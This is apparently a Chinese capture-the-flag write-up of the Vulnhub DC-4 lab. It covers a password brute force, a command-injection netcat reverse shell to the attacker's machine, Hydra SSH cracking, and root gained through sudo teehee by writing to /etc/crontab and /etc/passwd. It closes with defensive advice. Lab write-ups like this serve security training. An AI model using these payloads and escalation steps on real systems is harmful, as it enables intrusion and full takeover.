Vulnhub靶机DC-4渗透测试与teehee提权技术详解

一、环境准备

1.1 靶机下载与配置

• 下载地址：Vulnhub官网(https://www.vulnhub.com)
• 镜像类型：DC-4靶机(Mirror版本)
• 运行环境：VMware或VirtualBox
• 网络配置：桥接模式
• 攻击机：Kali Linux (IP: 192.168.2.19)
• 靶机IP：192.168.2.20

1.2 初始扫描

nmap -sV 192.168.2.20

扫描结果：

• 开放端口：22(SSH)、80(HTTP)

二、Web应用渗透

2.1 发现登录页面

访问http://192.168.2.20显示登录页面，提示需要admin账户登录

2.2 密码爆破

使用Burp Suite进行密码爆破：

1. 拦截登录请求
2. 发送到Intruder模块
3. 设置攻击类型为Sniper
4. 加载密码字典
5. 成功爆破出密码：happy

三、命令注入漏洞利用

3.1 功能分析

登录后发现有Command功能，允许执行：

• ls -l
• du -h
• df -h

3.2 反弹Shell

通过Burp修改请求参数实现反弹Shell：

radio=nc+192.168.2.19+9999+-e+/bin/bash&submit=Run

在Kali上监听：

nc -lvnp 9999

3.3 提升Shell交互性

python -c 'import pty;pty.spawn("/bin/bash")'

四、横向移动

4.1 用户目录枚举

cd /home
ls -la

发现三个用户：charles, jim, sam

4.2 获取jim用户凭证

在/home/jim/backups目录下发现密码本文件

4.3 SSH爆破

使用Hydra爆破jim用户密码：

hydra -l jim -P password.txt -t 10 ssh://192.168.2.20

成功获取密码：jibril04

4.4 获取charles用户凭证

在/var/mail目录下发现邮件，包含charles的密码：^xHhA&hvim0y

五、权限提升

5.1 检查sudo权限

sudo -l

发现teehee命令可以无密码以root权限执行

5.2 方法一：通过crontab提权

1. 创建定时任务：

echo "* * * * * root chmod 4777 /bin/sh" > /tmp/cronjob

2. 使用teehee写入crontab：

sudo teehee /etc/crontab < /tmp/cronjob

3. 等待任务执行后检查权限：

ls -la /bin/sh

4. 获取root shell：

/bin/sh

5.3 方法二：添加特权用户

1. 构造特权用户条目：

echo "test::0:0:::/bin/bash" > /tmp/newuser

2. 写入/etc/passwd：

sudo teehee -a /etc/passwd < /tmp/newuser

3. 切换用户：

su test

六、技术要点总结

1. 密码爆破：使用Burp Suite或Hydra等工具进行密码爆破
2. 命令注入：通过参数修改实现命令注入
3. 反弹Shell：使用netcat实现反向连接
4. 权限提升：
   • 利用sudo特权命令teehee
   • 通过crontab定时任务提权
   • 通过添加特权用户提权
5. 用户枚举：检查/home和/var/mail目录获取其他用户凭证

七、防御建议

1. 加强密码策略，使用复杂密码
2. 限制sudo权限，避免无密码执行特权命令
3. 对用户输入进行严格过滤，防止命令注入
4. 定期检查crontab和/etc/passwd文件异常条目
5. 限制敏感目录(如/var/mail)的访问权限